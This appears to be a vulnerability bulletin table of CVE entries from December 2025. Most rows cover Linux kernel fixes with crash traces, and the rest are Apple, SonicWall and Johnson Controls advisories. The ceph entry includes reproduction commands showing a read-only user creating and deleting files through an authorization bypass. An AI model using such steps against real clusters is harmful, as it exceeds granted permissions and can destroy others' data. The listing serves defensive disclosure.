| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfsplus: fix KMSAN uninit-value issue in hfsplus_delete_cat() The syzbot reported issue in hfsplus_delete_cat(): [ 70.682285][ T9333] ===================================================== [ 70.682943][ T9333] BUG: KMSAN: uninit-value in hfsplus_subfolders_dec+0x1d7/0x220 [ 70.683640][ T9333] hfsplus_subfolders_dec+0x1d7/0x220 [ 70.684141][ T9333] hfsplus_delete_cat+0x105d/0x12b0 [ 70.684621][ T9333] hfsplus_rmdir+0x13d/0x310 [ 70.685048][ T9333] vfs_rmdir+0x5ba/0x810 [ 70.685447][ T9333] do_rmdir+0x964/0xea0 [ 70.685833][ T9333] __x64_sys_rmdir+0x71/0xb0 [ 70.686260][ T9333] x64_sys_call+0xcd8/0x3cf0 [ 70.686695][ T9333] do_syscall_64+0xd9/0x1d0 [ 70.687119][ T9333] entry_SYSCALL_64_after_hwframe+0x77/0x7f [ 70.687646][ T9333] [ 70.687856][ T9333] Uninit was stored to memory at: [ 70.688311][ T9333] hfsplus_subfolders_inc+0x1c2/0x1d0 [ 70.688779][ T9333] hfsplus_create_cat+0x148e/0x1800 [ 70.689231][ T9333] hfsplus_mknod+0x27f/0x600 [ 70.689730][ T9333] hfsplus_mkdir+0x5a/0x70 [ 70.690146][ T9333] vfs_mkdir+0x483/0x7a0 [ 70.690545][ T9333] do_mkdirat+0x3f2/0xd30 [ 70.690944][ T9333] __x64_sys_mkdir+0x9a/0xf0 [ 70.691380][ T9333] x64_sys_call+0x2f89/0x3cf0 [ 70.691816][ T9333] do_syscall_64+0xd9/0x1d0 [ 70.692229][ T9333] entry_SYSCALL_64_after_hwframe+0x77/0x7f [ 70.692773][ T9333] [ 70.692990][ T9333] Uninit was stored to memory at: [ 70.693469][ T9333] hfsplus_subfolders_inc+0x1c2/0x1d0 [ 70.693960][ T9333] hfsplus_create_cat+0x148e/0x1800 [ 70.694438][ T9333] hfsplus_fill_super+0x21c1/0x2700 [ 70.694911][ T9333] mount_bdev+0x37b/0x530 [ 70.695320][ T9333] hfsplus_mount+0x4d/0x60 [ 70.695729][ T9333] legacy_get_tree+0x113/0x2c0 [ 70.696167][ T9333] vfs_get_tree+0xb3/0x5c0 [ 70.696588][ T9333] do_new_mount+0x73e/0x1630 [ 70.697013][ T9333] path_mount+0x6e3/0x1eb0 [ 70.697425][ T9333] __se_sys_mount+0x733/0x830 [ 70.697857][ T9333] __x64_sys_mount+0xe4/0x150 [ 70.698269][ T9333] x64_sys_call+0x2691/0x3cf0 [ 70.698704][ T9333] do_syscall_64+0xd9/0x1d0 [ 70.699117][ T9333] entry_SYSCALL_64_after_hwframe+0x77/0x7f [ 70.699730][ T9333] [ 70.699946][ T9333] Uninit was created at: [ 70.700378][ T9333] __alloc_pages_noprof+0x714/0xe60 [ 70.700843][ T9333] alloc_pages_mpol_noprof+0x2a2/0x9b0 [ 70.701331][ T9333] alloc_pages_noprof+0xf8/0x1f0 [ 70.701774][ T9333] allocate_slab+0x30e/0x1390 [ 70.702194][ T9333] ___slab_alloc+0x1049/0x33a0 [ 70.702635][ T9333] kmem_cache_alloc_lru_noprof+0x5ce/0xb20 [ 70.703153][ T9333] hfsplus_alloc_inode+0x5a/0xd0 [ 70.703598][ T9333] alloc_inode+0x82/0x490 [ 70.703984][ T9333] iget_locked+0x22e/0x1320 [ 70.704428][ T9333] hfsplus_iget+0x5c/0xba0 [ 70.704827][ T9333] hfsplus_btree_open+0x135/0x1dd0 [ 70.705291][ T9333] hfsplus_fill_super+0x1132/0x2700 [ 70.705776][ T9333] mount_bdev+0x37b/0x530 [ 70.706171][ T9333] hfsplus_mount+0x4d/0x60 [ 70.706579][ T9333] legacy_get_tree+0x113/0x2c0 [ 70.707019][ T9333] vfs_get_tree+0xb3/0x5c0 [ 70.707444][ T9333] do_new_mount+0x73e/0x1630 [ 70.707865][ T9333] path_mount+0x6e3/0x1eb0 [ 70.708270][ T9333] __se_sys_mount+0x733/0x830 [ 70.708711][ T9333] __x64_sys_mount+0xe4/0x150 [ 70.709158][ T9333] x64_sys_call+0x2691/0x3cf0 [ 70.709630][ T9333] do_syscall_64+0xd9/0x1d0 [ 70.710053][ T9333] entry_SYSCALL_64_after_hwframe+0x77/0x7f [ 70.710611][ T9333] [ 70.710842][ T9333] CPU: 3 UID: 0 PID: 9333 Comm: repro Not tainted 6.12.0-rc6-dirty #17 [ 70.711568][ T9333] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 [ 70.712490][ T9333] ===================================================== [ 70.713085][ T9333] Disabling lock debugging due to kernel taint [ 70.713618][ T9333] Kernel panic - not syncing: kmsan.panic set ... [ 70.714159][ T9333] ---truncated--- | 2025-12-16 | not yet calculated | CVE-2025-40351 | https://git.kernel.org/stable/c/a2bee43b451615531ae6f3cf45054f02915ef885 https://git.kernel.org/stable/c/b07630afe1671096dc64064190cae3b6165cf6e4 https://git.kernel.org/stable/c/9df3c241fbf69edce968b20eeeeb3f6da34af041 https://git.kernel.org/stable/c/1b9e5ade272f8be6421c9eea4c4f6810180017f9 https://git.kernel.org/stable/c/2bb8bc99b1a7a46d83f95c46f530305f6df84eaf https://git.kernel.org/stable/c/295527bfdefd5bf31ec8218e2891a65777141d05 https://git.kernel.org/stable/c/4891bf2b09c313622a6e07d7f108aa5e123c768d https://git.kernel.org/stable/c/9b3d15a758910bb98ba8feb4109d99cc67450ee4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: platform/mellanox: mlxbf-pmc: add sysfs_attr_init() to count_clock init The lock-related debug logic (CONFIG_LOCK_STAT) in the kernel is noting the following warning when the BlueField-3 SOC is booted: BUG: key ffff00008a3402a8 has not been registered! ------------[ cut here ]------------ DEBUG_LOCKS_WARN_ON(1) WARNING: CPU: 4 PID: 592 at kernel/locking/lockdep.c:4801 lockdep_init_map_type+0x1d4/0x2a0 <snip> Call trace: lockdep_init_map_type+0x1d4/0x2a0 __kernfs_create_file+0x84/0x140 sysfs_add_file_mode_ns+0xcc/0x1cc internal_create_group+0x110/0x3d4 internal_create_groups.part.0+0x54/0xcc sysfs_create_groups+0x24/0x40 device_add+0x6e8/0x93c device_register+0x28/0x40 __hwmon_device_register+0x4b0/0x8a0 devm_hwmon_device_register_with_groups+0x7c/0xe0 mlxbf_pmc_probe+0x1e8/0x3e0 [mlxbf_pmc] platform_probe+0x70/0x110 The mlxbf_pmc driver must call sysfs_attr_init() during the initialization of the "count_clock" data structure to avoid this warning. | 2025-12-16 | not yet calculated | CVE-2025-40352 | https://git.kernel.org/stable/c/46be1f5aae82b4136f676528ff091629697c7719 https://git.kernel.org/stable/c/a7b4747d8e0e7871c3d4971cded1dcc9af6af9e9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: arm64: mte: Do not warn if the page is already tagged in copy_highpage() The arm64 copy_highpage() assumes that the destination page is newly allocated and not MTE-tagged (PG_mte_tagged unset) and warns accordingly. However, following commit 060913999d7a ("mm: migrate: support poisoned recover from migrate folio"), folio_mc_copy() is called before __folio_migrate_mapping(). If the latter fails (-EAGAIN), the copy will be done again to the same destination page. Since copy_highpage() already set the PG_mte_tagged flag, this second copy will warn. Replace the WARN_ON_ONCE(page already tagged) in the arm64 copy_highpage() with a comment. | 2025-12-16 | not yet calculated | CVE-2025-40353 | https://git.kernel.org/stable/c/5ff5765a1fc526f07d3bbaedb061d970eb13bcf4 https://git.kernel.org/stable/c/0bbf3fc6e9211fce9889fe8efbb89c220504d617 https://git.kernel.org/stable/c/b98c94eed4a975e0c80b7e90a649a46967376f58 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: increase max link count and fix link->enc NULL pointer access [why] 1.) The dc->links[MAX_LINKS] array size is smaller than actually requested: max_connector + max_dpia + 4 virtual = 14. Increase it from 12 to 14. 2.) hw_init() accesses a null LINK_ENC for a dpia non-display_endpoint. (cherry picked from commit d7f5a61e1b04ed87b008c8d327649d184dc5bb45) | 2025-12-16 | not yet calculated | CVE-2025-40354 | https://git.kernel.org/stable/c/f28092be4e12b7df9e4f415d25bf0d767bc2d9ed https://git.kernel.org/stable/c/a3fc0d36cfb927f8986b83bf5fba47dbedad3c63 https://git.kernel.org/stable/c/bec947cbe9a65783adb475a5fb47980d7b4f4796 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sysfs: check visibility before changing group attribute ownership Since commit 0c17270f9b92 ("net: sysfs: Implement is_visible for phys_(port_id, port_name, switch_id)"), __dev_change_net_namespace() can hit WARN_ON() when trying to change owner of a file that isn't visible. See the trace below: WARNING: CPU: 6 PID: 2938 at net/core/dev.c:12410 __dev_change_net_namespace+0xb89/0xc30 CPU: 6 UID: 0 PID: 2938 Comm: incusd Not tainted 6.17.1-1-mainline #1 PREEMPT(full) 4b783b4a638669fb644857f484487d17cb45ed1f Hardware name: Framework Laptop 13 (AMD Ryzen 7040Series)/FRANMDCP07, BIOS 03.07 02/19/2025 RIP: 0010:__dev_change_net_namespace+0xb89/0xc30 [...] Call Trace: <TASK> ? if6_seq_show+0x30/0x50 do_setlink.isra.0+0xc7/0x1270 ? __nla_validate_parse+0x5c/0xcc0 ? security_capable+0x94/0x1a0 rtnl_newlink+0x858/0xc20 ? update_curr+0x8e/0x1c0 ? update_entity_lag+0x71/0x80 ? sched_balance_newidle+0x358/0x450 ? psi_task_switch+0x113/0x2a0 ? __pfx_rtnl_newlink+0x10/0x10 rtnetlink_rcv_msg+0x346/0x3e0 ? sched_clock+0x10/0x30 ? __pfx_rtnetlink_rcv_msg+0x10/0x10 netlink_rcv_skb+0x59/0x110 netlink_unicast+0x285/0x3c0 ? __alloc_skb+0xdb/0x1a0 netlink_sendmsg+0x20d/0x430 ____sys_sendmsg+0x39f/0x3d0 ? import_iovec+0x2f/0x40 ___sys_sendmsg+0x99/0xe0 __sys_sendmsg+0x8a/0xf0 do_syscall_64+0x81/0x970 ? __sys_bind+0xe3/0x110 ? syscall_exit_work+0x143/0x1b0 ? do_syscall_64+0x244/0x970 ? sock_alloc_file+0x63/0xc0 ? syscall_exit_work+0x143/0x1b0 ? do_syscall_64+0x244/0x970 ? alloc_fd+0x12e/0x190 ? put_unused_fd+0x2a/0x70 ? do_sys_openat2+0xa2/0xe0 ? syscall_exit_work+0x143/0x1b0 ? do_syscall_64+0x244/0x970 ? exc_page_fault+0x7e/0x1a0 entry_SYSCALL_64_after_hwframe+0x76/0x7e [...] </TASK> Fix this by checking is_visible() before trying to touch the attribute. | 2025-12-16 | not yet calculated | CVE-2025-40355 | https://git.kernel.org/stable/c/ac2c526e103285d80a0330b91a318f6c9276d35a https://git.kernel.org/stable/c/c7fbb8218b4ad35fec0bd2256d2b9c8d60331f33 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: rockchip-sfc: Fix DMA-API usage Use DMA-API dma_map_single() call for getting the DMA address of the transfer buffer instead of hacking with virt_to_phys(). This fixes the following DMA-API debug warning: ------------[ cut here ]------------ DMA-API: rockchip-sfc fe300000.spi: device driver tries to sync DMA memory it has not allocated [device address=0x000000000cf70000] [size=288 bytes] WARNING: kernel/dma/debug.c:1106 at check_sync+0x1d8/0x690, CPU#2: systemd-udevd/151 Modules linked in: ... Hardware name: Hardkernel ODROID-M1 (DT) pstate: 604000c9 (nZCv daIF +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : check_sync+0x1d8/0x690 lr : check_sync+0x1d8/0x690 .. Call trace: check_sync+0x1d8/0x690 (P) debug_dma_sync_single_for_cpu+0x84/0x8c __dma_sync_single_for_cpu+0x88/0x234 rockchip_sfc_exec_mem_op+0x4a0/0x798 [spi_rockchip_sfc] spi_mem_exec_op+0x408/0x498 spi_nor_read_data+0x170/0x184 spi_nor_read_sfdp+0x74/0xe4 spi_nor_parse_sfdp+0x120/0x11f0 spi_nor_sfdp_init_params_deprecated+0x3c/0x8c spi_nor_scan+0x690/0xf88 spi_nor_probe+0xe4/0x304 spi_mem_probe+0x6c/0xa8 spi_probe+0x94/0xd4 really_probe+0xbc/0x298 ... | 2025-12-16 | not yet calculated | CVE-2025-40356 | https://git.kernel.org/stable/c/22810d4cb0e8a7d51b24527e73beac60afc1c693 https://git.kernel.org/stable/c/ee795e82e10197c070efd380dc9615c73dffad6c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/smc: fix general protection fault in __smc_diag_dump syzbot reported a crash: Oops: general protection fault, probably for non-canonical address 0xfbd5a5d5a0000003: 0000 [#1] SMP KASAN NOPTI KASAN: maybe wild-memory-access in range [0xdead4ead00000018-0xdead4ead0000001f] CPU: 1 UID: 0 PID: 6949 Comm: syz.0.335 Not tainted syzkaller #0 PREEMPT(full) Hardware name: Google Compute Engine/Google Compute Engine, BIOS Google 08/18/2025 RIP: 0010:smc_diag_msg_common_fill net/smc/smc_diag.c:44 [inline] RIP: 0010:__smc_diag_dump.constprop.0+0x3ca/0x2550 net/smc/smc_diag.c:89 Call Trace: <TASK> smc_diag_dump_proto+0x26d/0x420 net/smc/smc_diag.c:217 smc_diag_dump+0x27/0x90 net/smc/smc_diag.c:234 netlink_dump+0x539/0xd30 net/netlink/af_netlink.c:2327 __netlink_dump_start+0x6d6/0x990 net/netlink/af_netlink.c:2442 netlink_dump_start include/linux/netlink.h:341 [inline] smc_diag_handler_dump+0x1f9/0x240 net/smc/smc_diag.c:251 __sock_diag_cmd net/core/sock_diag.c:249 [inline] sock_diag_rcv_msg+0x438/0x790 net/core/sock_diag.c:285 netlink_rcv_skb+0x158/0x420 net/netlink/af_netlink.c:2552 netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline] netlink_unicast+0x5a7/0x870 net/netlink/af_netlink.c:1346 netlink_sendmsg+0x8d1/0xdd0 net/netlink/af_netlink.c:1896 sock_sendmsg_nosec net/socket.c:714 [inline] __sock_sendmsg net/socket.c:729 [inline] ____sys_sendmsg+0xa95/0xc70 net/socket.c:2614 ___sys_sendmsg+0x134/0x1d0 net/socket.c:2668 __sys_sendmsg+0x16d/0x220 net/socket.c:2700 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xcd/0x4e0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f </TASK> The process is like this: (CPU1) \| (CPU2) ---------------------------------\|------------------------------- inet_create() \| // init clcsock to NULL \| sk = sk_alloc() \| \| // unexpectedly change clcsock \| inet_init_csk_locks() \| \| // add sk to hash table \| smc_inet_init_sock() \| smc_sk_init() \| smc_hash_sk() \| \| // traverse the hash table \| smc_diag_dump_proto \| __smc_diag_dump() \| // visit wrong clcsock \| smc_diag_msg_common_fill() // alloc clcsock \| smc_create_clcsk \| sock_create_kern \| With CONFIG_DEBUG_LOCK_ALLOC=y, the smc->clcsock is unexpectedly changed in inet_init_csk_locks(). The INET_PROTOSW_ICSK flag is not needed by smc, so just remove it. After removing the INET_PROTOSW_ICSK flag, this patch also reverts commit 6fd27ea183c2 ("net/smc: fix lacks of icsk_syn_mss with IPPROTO_SMC") to avoid casting smc_sock to inet_connection_sock. | 2025-12-16 | not yet calculated | CVE-2025-40357 | https://git.kernel.org/stable/c/5b6fc95c4a161326567bdf12a333768565b638f2 https://git.kernel.org/stable/c/99b5b3faf3220ba1cdab8e6e42be4f3f993937c3 https://git.kernel.org/stable/c/f584239a9ed25057496bf397c370cc5163dde419 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: riscv: stacktrace: Disable KASAN checks for non-current tasks When unwinding the stack of a task other than current, KASAN would report "BUG: KASAN: out-of-bounds in walk_stackframe+0x41c/0x460". The same issue exists on x86 and has been resolved by commit 84936118bdf3 ("x86/unwind: Disable KASAN checks for non-current tasks"). The solution can be applied to RISC-V too. This patch can also solve the issue: https://seclists.org/oss-sec/2025/q4/23 [pjw@kernel.org: clean up checkpatch issues] | 2025-12-16 | not yet calculated | CVE-2025-40358 | https://git.kernel.org/stable/c/f34ba22989da61186f30a40b6a82e0b3337b96fc https://git.kernel.org/stable/c/27379fcc15a10d3e3780fe79ba3fc7ed1ccd78e2 https://git.kernel.org/stable/c/2c8d2b53866fb229b438296526ef0fa5a990e5e5 https://git.kernel.org/stable/c/060ea84a484e852b52b938f234bf9b5503a6c910 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: perf/x86/intel: Fix KASAN global-out-of-bounds warning When running the "perf mem record" command on CWF, the KASAN global-out-of-bounds warning below is seen. ================================================================== BUG: KASAN: global-out-of-bounds in cmt_latency_data+0x176/0x1b0 Read of size 4 at addr ffffffffb721d000 by task dtlb/9850 Call Trace: kasan_report+0xb8/0xf0 cmt_latency_data+0x176/0x1b0 setup_arch_pebs_sample_data+0xf49/0x2560 intel_pmu_drain_arch_pebs+0x577/0xb00 handle_pmi_common+0x6c4/0xc80 The issue is caused by the code below in __grt_latency_data(). The code tries to access the x86_hybrid_pmu structure, which doesn't exist on non-hybrid platforms like CWF. WARN_ON_ONCE(hybrid_pmu(event->pmu)->pmu_type == hybrid_big) So add an is_hybrid() check before calling this WARN_ON_ONCE to fix the global-out-of-bounds access issue. | 2025-12-16 | not yet calculated | CVE-2025-40359 | https://git.kernel.org/stable/c/1b61a1da3d8105ea1be548c94c2856697eb7ffd1 https://git.kernel.org/stable/c/710a72e81a7028e1ad1a10eb14f941f8dd45ffd3 https://git.kernel.org/stable/c/0ba6502ce167fc3d598c08c2cc3b4ed7ca5aa251 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/sysfb: Do not dereference NULL pointer in plane reset The plane state in __drm_gem_reset_shadow_plane() can be NULL. Do not deref that pointer, but forward NULL to the other plane-reset helpers. Clears plane->state to NULL. v2: - fix typo in commit description (Javier) | 2025-12-16 | not yet calculated | CVE-2025-40360 | https://git.kernel.org/stable/c/6abeff03cb79a2c7f4554a8e8738acd35bb37152 https://git.kernel.org/stable/c/c4faf7f417eea8b8d5cc570a1015736f307aa2d5 https://git.kernel.org/stable/c/b61ed8005bd3102510fab5015ac6a275c9c5ea16 https://git.kernel.org/stable/c/6bdef5648a60e49d4a3b02461ab7ae3776877e77 https://git.kernel.org/stable/c/c7d5e69866bbe95c1e4ab4c10a81e0a02d9ea232 https://git.kernel.org/stable/c/14e02ed3876f4ab0ed6d3f41972175f8b8df3d70 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs: ext4: change GFP_KERNEL to GFP_NOFS to avoid deadlock The parent function ext4_xattr_inode_lookup_create already uses GFP_NOFS for memory allocation, so the function ext4_xattr_inode_cache_find should use the same gfp_flag. | 2025-12-16 | not yet calculated | CVE-2025-40361 | https://git.kernel.org/stable/c/5e6b27f4e68682aa3db9f83ca04adef89903159b https://git.kernel.org/stable/c/bb7d0d13c6e1f061464d1c425b08348a4e0c235d https://git.kernel.org/stable/c/add8458cac0b33a5e7a6b98457b38baea9600859 https://git.kernel.org/stable/c/199ab7b43c5ef7d384f6a08e786e107b3509acda https://git.kernel.org/stable/c/238f7a7356c33a9797a6297c6fdfd87f113b2325 https://git.kernel.org/stable/c/009127b0fc013aed193961686c28c2b541a5b2f3 https://git.kernel.org/stable/c/1534f72dc2a11ded38b0e0268fbcc0ca24e9fd4a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ceph: fix multifs mds auth caps issue The mds auth caps check should also validate the fsname along with the associated caps. Not doing so would result in applying the mds auth caps of one fs onto the other fs in a multifs ceph cluster. The bug causes multiple issues w.r.t. user authentication; following is one such example. Steps to Reproduce (on vstart cluster): 1. Create two file systems in a cluster, say 'fsname1' and 'fsname2' 2. Authorize read only permission to the user 'client.usr' on fs 'fsname1' $ceph fs authorize fsname1 client.usr / r 3. Authorize read and write permission to the same user 'client.usr' on fs 'fsname2' $ceph fs authorize fsname2 client.usr / rw 4. Update the keyring $ceph auth get client.usr >> ./keyring With the above permissions for the user 'client.usr', following is the expectation. a. The 'client.usr' should be able to only read the contents and not be allowed to create or delete files on file system 'fsname1'. b. The 'client.usr' should be able to read/write on file system 'fsname2'. But, with this bug, the 'client.usr' is allowed to read/write on file system 'fsname1'. See below. 5. Mount the file system 'fsname1' with the user 'client.usr' $sudo bin/mount.ceph usr@.fsname1=/ /kmnt_fsname1_usr/ 6. Try creating a file on file system 'fsname1' with user 'client.usr'. This should fail but passes with this bug. $touch /kmnt_fsname1_usr/file1 7. Mount the file system 'fsname1' with the user 'client.admin' and create a file. $sudo bin/mount.ceph admin@.fsname1=/ /kmnt_fsname1_admin $echo "data" > /kmnt_fsname1_admin/admin_file1 8. Try removing an existing file on file system 'fsname1' with the user 'client.usr'. This shouldn't succeed but succeeds with the bug. $rm -f /kmnt_fsname1_usr/admin_file1 For more information, please take a look at the corresponding mds/fuse patch and tests added by looking into the tracker mentioned below. v2: Fix a possible null dereference in doutc v3: Don't store fsname from mdsmap, validate against ceph_mount_options's fsname and use it v4: Code refactor, better warning message and fix possible compiler warning [ Slava.Dubeyko: "fsname check failed" -> "fsname mismatch" ] | 2025-12-16 | not yet calculated | CVE-2025-40362 | https://git.kernel.org/stable/c/07640d34a781bb2e39020a39137073c03c4aa932 https://git.kernel.org/stable/c/ca3da8b27ab9a0923ad477447cfb8fc7f4b4c523 https://git.kernel.org/stable/c/22c73d52a6d05c5a2053385c0d6cd9984732799d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: ipv6: fix field-spanning memcpy warning in AH output Fix field-spanning memcpy warnings in ah6_output() and ah6_output_done() where extension headers are copied to/from IPv6 address fields, triggering fortify-string warnings about writes beyond the 16-byte address fields. memcpy: detected field-spanning write (size 40) of single field "&top_iph->saddr" at net/ipv6/ah6.c:439 (size 16) WARNING: CPU: 0 PID: 8838 at net/ipv6/ah6.c:439 ah6_output+0xe7e/0x14e0 net/ipv6/ah6.c:439 The warnings are false positives as the extension headers are intentionally placed after the IPv6 header in memory. Fix by properly copying addresses and extension headers separately, and introduce helper functions to avoid code duplication. | 2025-12-16 | not yet calculated | CVE-2025-40363 | https://git.kernel.org/stable/c/2da805a61ef5272a2773775ce14c3650adb84248 https://git.kernel.org/stable/c/9bf27de51bd6db5ff827780ec0eba55de230ba45 https://git.kernel.org/stable/c/0bf756ae1e69fec5e6332c37830488315d6d771b https://git.kernel.org/stable/c/75b16b2755e12999ad850756ddfb88ad4bfc7186 https://git.kernel.org/stable/c/f28dde240160f3c48a50d641d210ed6a3b9596ed https://git.kernel.org/stable/c/c14cf41094136691c92ef756872570645d61f4a1 https://git.kernel.org/stable/c/b056f971bd72b373b7ae2025a8f3bd18f69653d3 https://git.kernel.org/stable/c/2327a3d6f65ce2fe2634546dde4a25ef52296fec |
| SonicWall--SMA1000 | A local privilege escalation vulnerability due to insufficient authorization in the SonicWall SMA1000 appliance management console (AMC). | 2025-12-18 | not yet calculated | CVE-2025-40602 | https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0019 |
| Apple--iOS and iPadOS | A configuration issue was addressed with additional restrictions. This issue is fixed in visionOS 26.2, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2. Photos in the Hidden Photos Album may be viewed without authentication. | 2025-12-17 | not yet calculated | CVE-2025-43428 | https://support.apple.com/en-us/125884 https://support.apple.com/en-us/125891 https://support.apple.com/en-us/125886 |
| Apple--iOS and iPadOS | A logging issue was addressed with improved data redaction. This issue is fixed in iOS 26.2 and iPadOS 26.2. An app may be able to access user-sensitive data. | 2025-12-17 | not yet calculated | CVE-2025-43475 | https://support.apple.com/en-us/125884 |
| Apple--iOS and iPadOS | A buffer overflow issue was addressed with improved memory handling. This issue is fixed in Safari 26.2, iOS 18.7.3 and iPadOS 18.7.3, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, visionOS 26.2. Processing maliciously crafted web content may lead to an unexpected process crash. | 2025-12-17 | not yet calculated | CVE-2025-43501 | https://support.apple.com/en-us/125885 https://support.apple.com/en-us/125892 https://support.apple.com/en-us/125884 https://support.apple.com/en-us/125891 https://support.apple.com/en-us/125886 |
| Apple--macOS | The issue was addressed with improved handling of caches. This issue is fixed in macOS Tahoe 26.2. An app may be able to access protected user data. | 2025-12-17 | not yet calculated | CVE-2025-43514 | https://support.apple.com/en-us/125886 |
| Apple--Safari | This issue was addressed with improved URL validation. This issue is fixed in macOS Tahoe 26.2, Safari 26.2. On a Mac with Lockdown Mode enabled, web content opened via a file URL may be able to use Web APIs that should be restricted. | 2025-12-17 | not yet calculated | CVE-2025-43526 | https://support.apple.com/en-us/125892 https://support.apple.com/en-us/125886 |
| Apple--iOS and iPadOS | A use-after-free issue was addressed with improved memory management. This issue is fixed in watchOS 26.2, Safari 26.2, iOS 18.7.3 and iPadOS 18.7.3, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, visionOS 26.2, tvOS 26.2. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 26. CVE-2025-14174 was also issued in response to this report. | 2025-12-17 | not yet calculated | CVE-2025-43529 | https://support.apple.com/en-us/125885 https://support.apple.com/en-us/125889 https://support.apple.com/en-us/125892 https://support.apple.com/en-us/125884 https://support.apple.com/en-us/125891 https://support.apple.com/en-us/125886 https://support.apple.com/en-us/125890 |
| Apple--iOS and iPadOS | A race condition was addressed with improved state handling. This issue is fixed in watchOS 26.2, Safari 26.2, iOS 18.7.3 and iPadOS 18.7.3, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, visionOS 26.2, tvOS 26.2. Processing maliciously crafted web content may lead to an unexpected process crash. | 2025-12-17 | not yet calculated | CVE-2025-43531 | https://support.apple.com/en-us/125885 https://support.apple.com/en-us/125889 https://support.apple.com/en-us/125892 https://support.apple.com/en-us/125884 https://support.apple.com/en-us/125891 https://support.apple.com/en-us/125886 https://support.apple.com/en-us/125890 |
| Apple--tvOS | Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in watchOS 26.2, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, visionOS 26.2, tvOS 26.2. A malicious HID device may cause an unexpected process crash. | 2025-12-17 | not yet calculated | CVE-2025-43533 | https://support.apple.com/en-us/125889 https://support.apple.com/en-us/125884 https://support.apple.com/en-us/125891 https://support.apple.com/en-us/125886 https://support.apple.com/en-us/125890 |
| Apple--iOS and iPadOS | The issue was addressed with improved memory handling. This issue is fixed in Safari 26.2, iOS 18.7.3 and iPadOS 18.7.3, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, visionOS 26.2. Processing maliciously crafted web content may lead to an unexpected process crash. | 2025-12-17 | not yet calculated | CVE-2025-43535 | https://support.apple.com/en-us/125885 https://support.apple.com/en-us/125892 https://support.apple.com/en-us/125884 https://support.apple.com/en-us/125891 https://support.apple.com/en-us/125886 |
| Apple--iOS and iPadOS | A use-after-free issue was addressed with improved memory management. This issue is fixed in macOS Tahoe 26.2, iOS 26.2 and iPadOS 26.2, Safari 26.2, iOS 18.7.3 and iPadOS 18.7.3. Processing maliciously crafted web content may lead to an unexpected process crash. | 2025-12-17 | not yet calculated | CVE-2025-43536 | https://support.apple.com/en-us/125885 https://support.apple.com/en-us/125892 https://support.apple.com/en-us/125884 https://support.apple.com/en-us/125886 |
| Apple--iOS and iPadOS | A type confusion issue was addressed with improved state handling. This issue is fixed in Safari 26.2, iOS 18.7.3 and iPadOS 18.7.3, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, visionOS 26.2. Processing maliciously crafted web content may lead to an unexpected Safari crash. | 2025-12-17 | not yet calculated | CVE-2025-43541 | https://support.apple.com/en-us/125885 https://support.apple.com/en-us/125892 https://support.apple.com/en-us/125884 https://support.apple.com/en-us/125891 https://support.apple.com/en-us/125886 |
| Johnson Control--iSTAR Ultra, iSTAR Ultra SE, iSTAR Ultra G2, iSTAR Ultra G2 SE, iSTAR Edge G2 | Successful exploitation of these vulnerabilities could allow an attacker to modify firmware and gain full access to the device. | 2025-12-17 | not yet calculated | CVE-2025-43873 | https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-02 |
| Apple--iOS and iPadOS | A logging issue was addressed with improved data redaction. This issue is fixed in macOS Tahoe 26.2, iOS 26.2 and iPadOS 26.2, watchOS 26.2. An app may be able to access a user's Safari history. | 2025-12-17 | not yet calculated | CVE-2025-46277 | https://support.apple.com/en-us/125884 https://support.apple.com/en-us/125886 https://support.apple.com/en-us/125890 |
| Apple--macOS | The issue was addressed with improved handling of caches. This issue is fixed in macOS Tahoe 26.2. An app may be able to access protected user data. | 2025-12-17 | not yet calculated | CVE-2025-46278 | https://support.apple.com/en-us/125886 |
| Apple--iOS and iPadOS | A permissions issue was addressed with additional restrictions. This issue is fixed in watchOS 26.2, iOS 18.7.3 and iPadOS 18.7.3, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, visionOS 26.2, tvOS 26.2. An app may be able to identify what other apps a user has installed. | 2025-12-17 | not yet calculated | CVE-2025-46279 | https://support.apple.com/en-us/125885 https://support.apple.com/en-us/125889 https://support.apple.com/en-us/125884 https://support.apple.com/en-us/125891 https://support.apple.com/en-us/125886 https://support.apple.com/en-us/125890 |
| Apple--macOS | A logic issue was addressed with improved checks. This issue is fixed in macOS Tahoe 26.2. An app may be able to break out of its sandbox. | 2025-12-17 | not yet calculated | CVE-2025-46281 | https://support.apple.com/en-us/125886 |
| Apple--Safari | The issue was addressed with additional permissions checks. This issue is fixed in macOS Tahoe 26.2, Safari 26.2. An app may be able to access sensitive user data. | 2025-12-17 | not yet calculated | CVE-2025-46282 | https://support.apple.com/en-us/125892 https://support.apple.com/en-us/125886 |
